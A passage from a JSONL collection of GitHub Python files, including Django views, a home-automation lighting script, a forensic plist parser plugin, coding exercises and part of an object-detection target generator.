self.onetotwo(self.df).reset_index([gbg, cpg])\n group1 = list(set(df1[gbg]))\n group2 = list(set(df1[cpg]))\n tt2 = np.ones((len(group1), len(group2)))\n pv2 = np.ones((len(group1), len(group2)))\n for i, g1 in enumerate(group1):\n group = df1[(df1[gbg]==g1)]\n for j, g2 in enumerate(group2):\n tt2[i,j], pv2[i, j] = stats.ttest_ind(group[self.value][group[cpg]==ctrl], group[self.value][group[cpg]==g2])\n \n pv3 = pd.DataFrame(pv2, index=group1, columns=group2)\n \n ps = range(len(pv3))\n\n for m in list(np.arange(len(pv3))):\n ps[m] = Series(pd.cut(pv3.ix[m, :], [0, 0.0001, 0.001, 0.01, 0.05, 1], right=False, labels=['****', '***', '**', '*', '']))\n\n psign = pd.DataFrame(ps)\n psign.index = group1\n psign.columns = group2\n\n pvalue = pv3.copy()\n\n return pvalue, psign\n","repo_name":"josephyan123/quantitative-gene-expression","sub_path":"ttest/ttest1.py","file_name":"ttest1.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2813291547","text":"from selenium.webdriver.common.by import By\nfrom seleniumbase import BaseCase\n\nfrom tests.end2end.helpers.screens.document.form_edit_grammar import (\n Form_EditGrammar,\n)\nfrom tests.end2end.helpers.screens.screen import Screen\n\n\nclass Screen_Document(Screen): # pylint: disable=invalid-name\n def __init__(self, test_case: BaseCase) -> None:\n assert isinstance(test_case, BaseCase)\n super().__init__(test_case)\n\n # overridden for Screen_Document\n\n def assert_on_screen_document(self) -> None:\n super().assert_on_screen(\"document\")\n\n def assert_empty_document(self) -> None:\n super().assert_empty_view(\"document-root-placeholder\")\n\n def assert_not_empty_document(self) -> None:\n super().assert_not_empty_view(\"document-root-placeholder\")\n\n # Actions on the page\n\n def do_export_reqif(self) -> None:\n self.test_case.click_xpath(\n '(//*[@data-testid=\"document-export-reqif-action\"])'\n )\n\n # Open forms\n\n def do_open_modal_form_edit_grammar(self) -> Form_EditGrammar:\n self.test_case.assert_element_not_present(\"//sdoc-modal\", by=By.XPATH)\n self.test_case.click_xpath(\n '(//*[@data-testid=\"document-edit-grammar-action\"])'\n )\n self.test_case.assert_element(\n \"//sdoc-modal\",\n by=By.XPATH,\n )\n return Form_EditGrammar(self.test_case)\n","repo_name":"strictdoc-project/strictdoc","sub_path":"tests/end2end/helpers/screens/document/screen_document.py","file_name":"screen_document.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"32"} +{"seq_id":"7440957723","text":"#Created by kenneth Zeng \n#the purpos of these code is for quick study for prepaing interview or catch up for job or refresh memory. sometime, easy code is fast to catch up \n#method overloading; double check with other lanague like java and c\n#sum(a, b) \n#sume(a, b,c) or more parameter\n\n\nclass Student:\n\n def __init__(self, m1, m2):\n self.m1= m1\n self.m2 = m2 \n\n\n def sum(self, a=None,b=None, c=None):\n if a != None and b != None and c != None:\n s = a + b + c\n elif a != None and b != None:\n s = a +b \n elif a != None: \n s = a\n return s\n\n\n\n\ns1 = Student(58,59)\n\nprint(s1.sum(6, 9)) #15\nprint(s1.sum(5)) #5\nprint(s1.sum(6,7, 5)) #18","repo_name":"kennethyzeng/pythonByTopics_N_SmallProjects","sub_path":"A001_OOP/polymorphism_methodOverloading.py","file_name":"polymorphism_methodOverloading.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38111242898","text":"# Time complexity: O(m*n)\n# Space complexity:O(m*n)\n# m is the length of coins\n# n is the amount\n\nclass Solution:\n def change(self, amount: int, coins: List[int]) -> int:\n rows = len(coins) + 1\n columns = amount + 1\n \n dp = [[0 for j in range(amount + 1)] for i in range(len(coins) + 1)]\n \n for i in range(len(dp)):\n dp[i][0] = 1\n \n for i in range(1,len(dp)):\n for j in range(1,len(dp[0])):\n \n if j < coins[i-1]:\n # till we have not reached the denomination of the coin\n dp[i][j] = dp[i-1][j]\n \n else:\n dp[i][j] = dp[i-1][j] + dp[i][j - coins[i-1]]\n \n return dp[len(dp) - 1][len(dp[0]) - 1]","repo_name":"sahilshembekar/LeetCode-Problems","sub_path":"518-Coin-Change-2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44157647177","text":"#!/usr/bin/python3\n\nfrom googlesearch import search\nimport re\nfrom stackapi import StackAPI\n\nquery=input('enter you want to search')\ndata=search(query+' stackoverflow',num=10,tld=\"com\",stop=10)\nquestions=[]\nfor url in data:\n\tif re.search('stackoverflow.com',url)!=None:\n\t\tquestions.append(url)\nquestions_ids=[]\nfor url in questions:\n\tq_id=url.split('/')[4]\n\tquestions_ids.append(q_id)\n\t\nsite = StackAPI('stackoverflow')\nans_list=[]\nlength=len(questions_ids)\nall_answers=site.fetch('questions/{ids}/answers',filter='!9Z(-wzftf',ids=questions_ids)\nitems=all_answers['items']\nfor answer in items:\n\tif answer['is_accepted']==True:\n\t\tans_list.append(answer['body_markdown'])\nfor i in ans_list:\n\tprint(i)\n\tprint('\\n\\n')\n\n\n","repo_name":"puneetmanghwani/stackoverflow","sub_path":"search_get_ans.py","file_name":"search_get_ans.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21119478525","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django import forms\n\nfrom . import util\n\nimport markdown2\nimport random\n\nclass NewEntryForm(forms.Form):\n title = forms.CharField(label=\"Title\", widget=forms.TextInput(attrs={'class': 'form-control col-md-10 col-lg-10'}))\n content = forms.CharField(label=\"\",widget=forms.Textarea(attrs={'class': 'form-control col-md-10 col-lg-10', 'rows': 12}))\n edit = forms.BooleanField(initial=False, widget=forms.HiddenInput(), required=False)\n\ndef createEntry(request):\n if request.method != \"POST\":\n return render(request,\"encyclopedia/new_entry.html\", {\"form\": NewEntryForm()})\n else:\n form = NewEntryForm(request.POST)\n\n if form.is_valid():\n title = form.cleaned_data[\"title\"]\n content = form.cleaned_data[\"content\"]\n\n if(util.get_entry(title) is None or form.cleaned_data[\"edit\"] is True):\n util.save_entry(title,content)\n return HttpResponseRedirect(reverse(\"entry\", kwargs={'title': title}))\n else:\n return render(request, \"encyclopedia/new_entry.html\", {\n \"form\": form,\n \"existing\": True,\n \"entry\": title\n })\n else:\n return render(request, \"encyclopedia/new_entry.html\", {\"form\": form})\n\ndef editEntry(request, title):\n entry = util.get_entry(title)\n \n if entry is None:\n return render(request, \"encyclopedia/missing_entry.html\", {\n \"title\": title \n })\n else:\n form = NewEntryForm()\n form.fields[\"title\"].initial = title\n form.fields[\"content\"].initial = entry\n form.fields[\"edit\"].initial = True\n\n return render(request, \"encyclopedia/new_entry.html\", {\n \"form\": form,\n \"title\": title,\n \"edit\": form.fields[\"edit\"].initial\n })\n\ndef entry(request, title):\n entry = util.get_entry(title)\n \n if entry != None:\n return render(request, \"encyclopedia/entry.html\", {\n \"entry\": markdown2.markdown(entry), \"title\": title\n })\n else:\n return render(request, \"encyclopedia/missing_entry.html\", {\n \"title\": title\n })\n\ndef index(request):\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": util.list_entries()\n })\n\ndef randomEntry(request):\n entries = util.list_entries()\n randomEntry = random.choice(entries)\n\n return HttpResponseRedirect(reverse(\"entry\", kwargs={'title': randomEntry}))\n\ndef search(request):\n searched_entry = request.GET.get('q','')\n\n if(util.get_entry(searched_entry) is not None):\n return HttpResponseRedirect(reverse(\"entry\", kwargs={'title': searched_entry }))\n else:\n matchingEntries = []\n\n for entry in util.list_entries():\n if searched_entry.upper() in entry.upper():\n matchingEntries.append(entry)\n\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": matchingEntries, \"searched_entry\": searched_entry\n })","repo_name":"Fractalbuilder/Wiki","sub_path":"encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9456483092","text":"\"\"\"\nMotion sensors to control the stairway lights going up.\n\"\"\"\n\nimport appdaemon.plugins.hass.hassapi as hass\n\nclass MotionClass(hass.Hass):\n\n def initialize(self):\n # Motion sensors.\n\n self.motion_sensors = [\n \"binary_sensor.presence_entrance\", # Entrance Motion Sensor\n \"binary_sensor.presence_top_floor_stairway\" # Top Floor Stairs Motion Sensor\n ]\n\n self.illumination_sensors = [\n \"sensor.lightlevel_top_floor_stairway\" # Top Floor Stairs Motion Illumination Sensor\n ]\n\n for entity in self.motion_sensors:\n self.listen_state(self.motionTrigger,entity)\n\n for entity in self.illumination_sensors:\n self.listen_state(self.motionTrigger,entity)\n\n self.listen_state(self.inpuBoolean,\"input_boolean.top_floor_lights_motion_control\")\n\n\n def areWeAwake(self, entity):\n \"\"\" Check whether anyone is awake\"\"\"\n if self.get_state(entity) == \"on\":\n return True\n\n # Returns value of state as integer. Might need to remove the \"float\" is you get errors.\n def getIntegerState(self, entity_id):\n \"\"\" Get integer of illumination state\"\"\"\n try:\n return int(float(self.get_state(entity_id)))\n except ValueError:\n return 0\n\n def motionTrigger(self, entity, attribute, old, new, kwargs):\n \"\"\" Turn on/off lights\"\"\"\n sensor_1_state = self.get_state(\"binary_sensor.presence_entrance\") # Entrance Motion\n sensor_2_state = self.get_state(\"binary_sensor.presence_top_floor_stairway\") # Top Floor Stairs Motion Sensor\n\n awake = self.areWeAwake(\"light.living_room_lights\")\n party_mode = self.get_state('input_boolean.party_mode') == 'on'\n workday = self.get_state('sensor.workday_actual') == 'on'\n workday_tomorrow= self.get_state('sensor.workday_actual', attribute='workday_tomorrow') == 'on'\n\n # if party_mode:\n # if new == 'on':\n # self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n # else:\n # self.turn_off(\"light.stairway_up\")\n\n if entity == \"binary_sensor.presence_entrance\" and new == 'on':\n # if sensor_2_state == 'off':\n if party_mode:\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n elif self.now_is_between('07:00:00', '09:00:00'):\n if workday:\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n elif self.now_is_between('09:00:00', '22:00:00'):\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n elif self.now_is_between('22:00:00', '07:00:00'):\n if awake:\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n # else:\n # self.turn_on(\"light.stairway_up\",brightness=10,kelvin=2200)\n\n\n elif entity == \"binary_sensor.presence_top_floor_stairway\" and new == 'on':\n if party_mode:\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n if sensor_1_state == 'off':\n if self.now_is_between('07:00:00', '22:00:00'):\n if self.getIntegerState(\"sensor.lightlevel_top_floor_stairway\") < 50:\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n\n elif self.now_is_between('22:00:00', '07:00:00'):\n if awake:\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n else:\n self.turn_on(\"light.stairway_up\",brightness=50,kelvin=2200)\n\n elif sensor_1_state == 'on' and sensor_2_state == 'on': # in the off chance that one motion sensor triggers, and the next is turned on before the check is performed.\n self.turn_on(\"light.stairway_up\",brightness=255,kelvin=2700)\n\n elif sensor_1_state == 'off' and sensor_2_state == 'off':\n self.turn_off(\"light.stairway_up\")\n\n def inpuBoolean(self, entity, attribute, old, new, kwargs):\n\n if new == \"on\":\n self.motionTrigger(entity, attribute, old, new, kwargs)\n","repo_name":"Aephir/HomeAssistantConfig","sub_path":"appdaemon/apps/motion/stairway_up_lights.py","file_name":"stairway_up_lights.py","file_ext":"py","file_size_in_byte":4221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"6144958768","text":"from django.shortcuts import render, redirect\nfrom django.contrib.sites.shortcuts import get_current_site\nimport datetime\nfrom calendar import Calendar\n\n\ndef index(request):\n current_date = datetime.datetime.now()\n current_weekday = datetime.datetime.now().weekday()\n month_iter = Calendar(6).itermonthdates(current_date.year, current_date.month)\n day_before = []\n day_month = []\n day_after = []\n for day in month_iter:\n if day.year < current_date.year or (day.year == current_date.year and day.month < current_date.month):\n day_before.append(day.day)\n elif day.year > current_date.year or (day.year == current_date.year and day.month > current_date.month):\n day_after.append(day.day)\n else:\n day_month.append(day.day)\n return render(request, 'basic/index.html', context={\n 'current_date': current_date,\n 'current_weekday': current_weekday,\n 'day_before': day_before,\n 'day_month': day_month,\n 'day_after': day_after\n })\n\n\ndef about(request):\n return render(request, 'basic/about.html', context={})\n\n\ndef android_browser(request): \n return redirect('https://www.jianyang995.com/projects/project/P3');","repo_name":"yangjufo/Personal-Website","sub_path":"mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26802092845","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Dec 25 11:28:46 2018\r\n\r\n@author: badat\r\n\"\"\"\r\n\r\nprint('Correct Version')\r\n\r\ndescription = 'using GloVe w2v\\n'\r\ndescription += '-'*30 +'\\n'\r\ndescription += 'VGG'+'\\n'\r\ndescription += '-'*30 +'\\n'\r\nprint(description)\r\n\r\ndim_feature=[14*14,512]\r\nbatch_size=32\r\n\r\ndocker_path = './'\r\nNFS_path = docker_path\r\n\r\n\r\ndim_feature=[14*14,512]\r\nn_epoches = 2\r\nn_train_sample = 5501586\r\n\r\ntrain_img_path = NFS_path+'TFRecords/train_feature_2018_04_ZLIB.tfrecords'\r\nval_img_path = NFS_path+'TFRecords/validation_feature_2018_04_ZLIB.tfrecords'\r\ntest_img_path = NFS_path+'TFRecords/OI_seen_unseen_test_feature_2018_04_ZLIB.tfrecords'\r\n\r\n############# n_iters #############\r\nn_iters = (n_train_sample//batch_size)\r\nif n_train_sample%batch_size != 0:\r\n n_iters += 1\r\nn_iters *= n_epoches\r\n############# n_iters #############\r\ninit_w2v = NFS_path+'wiki_contexts/OpenImage_w2v_context_window_10_glove-wiki-gigaword-300.pkl'\r\nn_report = 150\r\n############# learning_rate #############\r\nlearning_rate_phase_1 = 0.01\r\nlearning_rate_phase_2 = 0.001\r\n\r\n\r\n#################### NUS_WIDE ####################\r\nNUS_WIDE_train_img_path = NFS_path+'TFRecords/NUS_WIDE_Train_full_feature_ZLIB.tfrecords'\r\nNUS_WIDE_val_img_path = NFS_path+'TFRecords/NUS_WIDE_Train_full_feature_ZLIB.tfrecords'\r\nNUS_WIDE_test_img_path = NFS_path+'TFRecords/NUS_WIDE_Test_full_feature_ZLIB.tfrecords'\r\n\r\nNUS_WIDE_n_train_sample = 80000\r\nNUS_WIDE_init_w2v = NFS_path+'wiki_contexts/NUS_WIDE_pretrained_w2v_glove-wiki-gigaword-300'\r\nNUS_WIDE_n_iters = 80000//batch_size*40\r\nNUS_WIDE_zs_n_iters = 80000//batch_size*80\r\nNUS_WIDE_signal_str = 0.3","repo_name":"hbdat/cvpr20_LESA","sub_path":"global_setting.py","file_name":"global_setting.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"32"} +{"seq_id":"20415868574","text":"import pandas as pd\r\nimport os\r\n\r\n\r\nlink = pd.read_csv('assets/links.csv')\r\nnode = pd.read_csv('assets/nodes.csv')\r\ntraffic = pd.read_csv('assets/data2013_1st_week.csv')\r\nlong_island_solar = pd.read_csv('assets/long-island_2013_january_week1.csv')\r\nbrentwood_solar = pd.read_csv('assets/brentwood_2013_Jan_week1.csv')\r\nmedian_serial = {}\r\nnode_to_median = {}\r\nmedians: any\r\n\r\nlatlongs = []\r\n\r\ndef populateLatLong(number_of_medians):\r\n print(\"Populate lat longs......\")\r\n global latlongs, node_to_median\r\n\r\n for index in range(number_of_medians):\r\n dir_name = 'assets/'\r\n temp = pd.read_csv(os.path.join(dir_name, 'latlongs' + str(index+1) + '.csv'))\r\n latlongs.append(temp)\r\n latlongs[index].columns = ['sl.', 'node_id', 'xcoord', 'ycoord']\r\n\r\n for i, row in latlongs[index].iterrows():\r\n node_to_median[row.node_id] = index\r\n \r\n\r\ndef updateMedians():\r\n print(\"Update medians......\")\r\n global medians, median_serial\r\n\r\n medians = pd.read_csv('assets/medians.csv')\r\n medians.columns = ['sl.', 'node_id', 'xcoord', 'ycoord']\r\n \r\n for index, row in medians.iterrows():\r\n median_serial[row.node_id] = index","repo_name":"ahnaf2556/distribute-battery-electric-vehicle","sub_path":"source/simulateOrder/populateData.py","file_name":"populateData.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"862473779","text":"# only two types of loops\n# for and while\nx = [{\"id\": 1, \"name\": \"raj\"}, {\"id\": 2, \"name\": \"rajender\"},\n {\"id\": 3, \"name\": \"rajenderDandyal\"}]\n\nfor item in x:\n print(item[\"id\"])\n print(item[\"name\"])\n\n# break and continue\nfor item in x:\n if item[\"name\"] == \"rajender\":\n continue\n print(item[\"name\"])\n\nfor item in x:\n if item[\"id\"] == 2:\n break\n print(item[\"id\"])\n\n# for else\n# look for name starting with J\n# if found print Found else Not Found\nfound = False\nfor items in x:\n if item[\"name\"].startswith('J'):\n found = True\n break\n\nmessage = \"Found\" if found else \"Not found\"\nprint(message)\n\n# with for else\n# else block executes if the for loop executes successfully\n# without using the break statement\nmessage = None\nfor item in x:\n if item['name'].startswith('J'):\n message = \"Found\"\n break\nelse:\n message = \"Not found\"\nprint(message)\n\n# range\nz = 0\nfor z in range(0, 10, 1):\n print(z)\n\n\n# while loop\ny = 0\nwhile y <= 10:\n print(y)\n y = y+1\n\n# while with else\n# else block will execute even if while loop dosent\nwhile 10 < y < 15:\n print('i am y')\n y = y+1\nelse:\n print('i am y in else')\n","repo_name":"RajenderDandyal/easy-python","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17029583601","text":"from plaso.events import plist_event\nfrom plaso.parsers import plist\nfrom plaso.parsers.plist_plugins import interface\n\n\n__author__ = 'Joaquin Moreno Garijo (Joaquin.MorenoGarijo.2013@live.rhul.ac.uk)'\n\n\nclass SpotlightPlugin(interface.PlistPlugin):\n \"\"\"Basic plugin to extract Spotlight.\"\"\"\n\n NAME = 'plist_spotlight'\n DESCRIPTION = u'Parser for Spotlight plist files.'\n\n PLIST_PATH = 'com.apple.spotlight.plist'\n PLIST_KEYS = frozenset(['UserShortcuts'])\n\n # Generated events:\n # name of the item: searched term.\n # PATH: path of the program associated to the term.\n # LAST_USED: last time when it was executed.\n # DISPLAY_NAME: the display name of the program associated.\n\n def GetEntries(self, parser_context, match=None, **unused_kwargs):\n \"\"\"Extracts relevant Spotlight entries.\n\n Args:\n parser_context: A parser context object (instance of ParserContext).\n match: Optional dictionary containing keys extracted from PLIST_KEYS.\n The default is None.\n \"\"\"\n for search_text, data in match['UserShortcuts'].iteritems():\n description = (\n u'Spotlight term searched \"{0:s}\" associate to {1:s} '\n u'({2:s})').format(search_text, data['DISPLAY_NAME'], data['PATH'])\n event_object = plist_event.PlistEvent(\n u'/UserShortcuts', search_text, data['LAST_USED'], description)\n parser_context.ProduceEvent(event_object, plugin_name=self.NAME)\n\n\nplist.PlistParser.RegisterPlugin(SpotlightPlugin)\n","repo_name":"cvandeplas/plaso","sub_path":"plaso/parsers/plist_plugins/spotlight.py","file_name":"spotlight.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"40813135387","text":"from poplib import POP3_SSL_PORT\nfrom django.shortcuts import render\n\n\nposts = [\n {\n 'authors':'Inno',\n 'title':'Insta Post',\n 'content':'First post content',\n 'date_posted':'August 27,2021'\n\n },\n {\n 'authors':'Jane',\n 'title':'Insta Post 2',\n 'content':'Second post content',\n 'date_posted':'August 29,2021'\n\n }\n]\n\ndef home(request):\n context = {\n 'posts': posts\n }\n return render(request,'insta/home.html', context)\n\ndef about(request):\n return render(request,'insta/about.html')","repo_name":"Cencious/django_django","sub_path":"insta/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"21119225750","text":"from itertools import combinations\nn = int(input())\n\n# 모든 감소하는 수\nresult = list()\n# 1~10개의 조합 만들기, 10자리수가 마지막 수임\nfor i in range(1, 11):\n for comb in combinations(range(10), i): # 0~9로 하나씩 조합 만들기\n comb = list(comb)\n comb.sort(reverse=True) # 해당 조합을 감소하는 수로 변경\n result.append(int(\"\".join(list(map(str, comb)))))\n\n# 오름차순 정렬\nresult.sort()\n\nif n >= len(result):\n print(-1)\n\n# 인덱스가 넘어 가는 경우 -1 출력. 마지막 수 9876543210\nelse:\n print(result[n])","repo_name":"GyuJeGal/Algorithm-Study","sub_path":"BaekJoon/Problem1038.py","file_name":"Problem1038.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"21756518940","text":"import tensorflow as tf\nimport sonnet as snt\n\nfrom luminoth.utils.bbox_transform_tf import encode\nfrom luminoth.utils.bbox_overlap import bbox_overlap_tf\n\n\nclass RCNNTarget(snt.AbstractModule):\n \"\"\"Generate RCNN target tensors for both probabilities and bounding boxes.\n\n Targets for RCNN are based upon the results of the RPN, this can get tricky\n in the sense that RPN results might not be the best and it might not be\n possible to have the ideal amount of targets for all the available ground\n truth boxes.\n\n There are two types of targets, class targets and bounding box targets.\n\n Class targets are used both for background and foreground, while bounding\n box targets are only used for foreground (since it's not possible to create\n a bounding box of \"background objects\").\n\n A minibatch size determines how many targets are going to be generated and\n how many are going to be ignored. RCNNTarget is responsible for choosing\n which proposals and corresponding targets are included in the minibatch and\n which ones are completely ignored.\n \"\"\"\n def __init__(self, num_classes, config, seed=None, variances=None,\n name='rcnn_proposal'):\n \"\"\"\n Args:\n num_classes: Number of possible classes.\n config: Configuration object for RCNNTarget.\n \"\"\"\n super(RCNNTarget, self).__init__(name=name)\n self._num_classes = num_classes\n self._variances = variances\n # Ratio of foreground vs background for the minibatch.\n self._foreground_fraction = config.foreground_fraction\n self._minibatch_size = config.minibatch_size\n # IoU lower threshold with a ground truth box to be considered that\n # specific class.\n self._foreground_threshold = config.foreground_threshold\n # High and low treshold to be considered background.\n self._background_threshold_high = config.background_threshold_high\n self._background_threshold_low = config.background_threshold_low\n self._seed = seed\n\n def _build(self, proposals, gt_boxes):\n \"\"\"\n Args:\n proposals: A Tensor with the RPN bounding boxes proposals.\n The shape of the Tensor is (num_proposals, 4).\n gt_boxes: A Tensor with the ground truth boxes for the image.\n The shape of the Tensor is (num_gt, 5), having the truth label\n as the last value for each box.\n Returns:\n proposals_label: Either a truth value of the proposals (a value\n between 0 and num_classes, with 0 being background), or -1 when\n the proposal is to be ignored in the minibatch.\n The shape of the Tensor is (num_proposals, 1).\n bbox_targets: A bounding box regression target for each of the\n proposals that have and greater than zero label. For every\n other proposal we return zeros.\n The shape of the Tensor is (num_proposals, 4).\n \"\"\"\n overlaps = bbox_overlap_tf(proposals, gt_boxes[:, :4])\n # overlaps now contains (num_proposals, num_gt_boxes) with the IoU of\n # proposal P and ground truth box G in overlaps[P, G]\n\n # We are going to label each proposal based on the IoU with\n # `gt_boxes`. Start by filling the labels with -1, marking them as\n # ignored.\n proposals_label_shape = tf.gather(tf.shape(proposals), [0])\n proposals_label = tf.fill(\n dims=proposals_label_shape,\n value=-1.\n )\n # For each overlap there is three possible outcomes for labelling:\n # if max(iou) < config.background_threshold_low then we ignore.\n # elif max(iou) <= config.background_threshold_high then we label\n # background.\n # elif max(iou) > config.foreground_threshold then we label with\n # the highest IoU in overlap.\n #\n # max_overlaps gets, for each proposal, the index in which we can\n # find the gt_box with which it has the highest overlap.\n max_overlaps = tf.reduce_max(overlaps, axis=1)\n\n iou_is_high_enough_for_bg = tf.greater_equal(\n max_overlaps, self._background_threshold_low\n )\n iou_is_not_too_high_for_bg = tf.less(\n max_overlaps, self._background_threshold_high\n )\n bg_condition = tf.logical_and(\n iou_is_high_enough_for_bg, iou_is_not_too_high_for_bg\n )\n proposals_label = tf.where(\n condition=bg_condition,\n x=tf.zeros_like(proposals_label, dtype=tf.float32),\n y=proposals_label\n )\n\n # Get the index of the best gt_box for each proposal.\n overlaps_best_gt_idxs = tf.argmax(overlaps, axis=1)\n # Having the index of the gt bbox with the best label we need to get\n # the label for each gt box and sum it one because 0 is used for\n # background.\n best_fg_labels_for_proposals = tf.add(\n tf.gather(gt_boxes[:, 4], overlaps_best_gt_idxs),\n 1.\n )\n iou_is_fg = tf.greater_equal(\n max_overlaps, self._foreground_threshold\n )\n best_proposals_idxs = tf.argmax(overlaps, axis=0)\n\n # Set the indices in best_proposals_idxs to True, and the rest to\n # false.\n # tf.sparse_to_dense is used because we know the set of indices which\n # we want to set to True, and we know the rest of the indices\n # should be set to False. That's exactly the use case of\n # tf.sparse_to_dense.\n is_best_box = tf.sparse_to_dense(\n sparse_indices=tf.reshape(best_proposals_idxs, [-1]),\n sparse_values=True, default_value=False,\n output_shape=tf.cast(proposals_label_shape, tf.int64),\n validate_indices=False\n )\n # We update proposals_label with the value in\n # best_fg_labels_for_proposals only when the box is foreground.\n proposals_label = tf.where(\n condition=iou_is_fg,\n x=best_fg_labels_for_proposals,\n y=proposals_label\n )\n # Now we need to find the proposals that are the best for each of the\n # gt_boxes. We overwrite the previous proposals_label with this\n # because setting the best proposal for each gt_box has priority.\n best_proposals_gt_labels = tf.sparse_to_dense(\n sparse_indices=tf.reshape(best_proposals_idxs, [-1]),\n sparse_values=gt_boxes[:, 4] + 1,\n default_value=0.,\n output_shape=tf.cast(proposals_label_shape, tf.int64),\n validate_indices=False,\n name=\"get_right_labels_for_bestboxes\"\n )\n proposals_label = tf.where(\n condition=is_best_box,\n x=best_proposals_gt_labels,\n y=proposals_label,\n name=\"update_labels_for_bestbox_proposals\"\n )\n\n # proposals_label now has a value in [0, num_classes + 1] for\n # proposals we are going to use and -1 for the ones we should ignore.\n # But we still need to make sure we don't have a number of proposals\n # higher than minibatch_size * foreground_fraction.\n max_fg = int(self._foreground_fraction * self._minibatch_size)\n fg_condition = tf.logical_or(\n iou_is_fg, is_best_box\n )\n fg_inds = tf.where(\n condition=fg_condition\n )\n\n def disable_some_fgs():\n # We want to delete a randomly-selected subset of fg_inds of\n # size `fg_inds.shape[0] - max_fg`.\n # We shuffle along the dimension 0 and then we get the first\n # num_fg_inds - max_fg indices and we disable them.\n shuffled_inds = tf.random_shuffle(fg_inds, seed=self._seed)\n disable_place = (tf.shape(fg_inds)[0] - max_fg)\n # This function should never run if num_fg_inds <= max_fg, so we\n # add an assertion to catch the wrong behaviour if it happens.\n integrity_assertion = tf.assert_positive(\n disable_place,\n message=\"disable_place in disable_some_fgs is negative.\"\n )\n with tf.control_dependencies([integrity_assertion]):\n disable_inds = shuffled_inds[:disable_place]\n is_disabled = tf.sparse_to_dense(\n sparse_indices=disable_inds,\n sparse_values=True, default_value=False,\n output_shape=tf.cast(proposals_label_shape, tf.int64),\n # We are shuffling the indices, so they may not be ordered.\n validate_indices=False\n )\n return tf.where(\n condition=is_disabled,\n # We set it to -label for debugging purposes.\n x=tf.negative(proposals_label),\n y=proposals_label\n )\n # Disable some fgs if we have too many foregrounds.\n proposals_label = tf.cond(\n tf.greater(tf.shape(fg_inds)[0], max_fg),\n true_fn=disable_some_fgs,\n false_fn=lambda: proposals_label\n )\n\n total_fg_in_batch = tf.shape(\n tf.where(\n condition=tf.greater(proposals_label, 0)\n )\n )[0]\n\n # Now we want to do the same for backgrounds.\n # We calculate up to how many backgrounds we desire based on the\n # final number of foregrounds and the total desired batch size.\n max_bg = self._minibatch_size - total_fg_in_batch\n\n # We can't use bg_condition because some of the proposals that satisfy\n # the IoU conditions to be background may have been labeled as\n # foreground due to them being the best proposal for a certain gt_box.\n bg_mask = tf.equal(proposals_label, 0)\n bg_inds = tf.where(\n condition=bg_mask,\n )\n\n def disable_some_bgs():\n # Mutatis mutandis, all comments from disable_some_fgs apply.\n shuffled_inds = tf.random_shuffle(bg_inds, seed=self._seed)\n disable_place = (tf.shape(bg_inds)[0] - max_bg)\n integrity_assertion = tf.assert_non_negative(\n disable_place,\n message=\"disable_place in disable_some_bgs is negative.\"\n )\n with tf.control_dependencies([integrity_assertion]):\n disable_inds = shuffled_inds[:disable_place]\n is_disabled = tf.sparse_to_dense(\n sparse_indices=disable_inds,\n sparse_values=True, default_value=False,\n output_shape=tf.cast(proposals_label_shape, tf.int64),\n validate_indices=False\n )\n return tf.where(\n condition=is_disabled,\n x=tf.fill(\n dims=proposals_label_shape,\n value=-1.\n ),\n y=proposals_label\n )\n\n proposals_label = tf.cond(\n tf.greater_equal(tf.shape(bg_inds)[0], max_bg),\n true_fn=disable_some_bgs,\n false_fn=lambda: proposals_label\n )\n\n \"\"\"\n Next step is to calculate the proper targets for the proposals labeled\n based on the values of the ground-truth boxes.\n We have to use only the proposals labeled >= 1, each matching with\n the proper gt_boxes\n \"\"\"\n\n # Get the ids of the proposals that matter for bbox_target comparisson.\n is_proposal_with_target = tf.greater(\n proposals_label, 0\n )\n proposals_with_target_idx = tf.where(\n condition=is_proposal_with_target\n 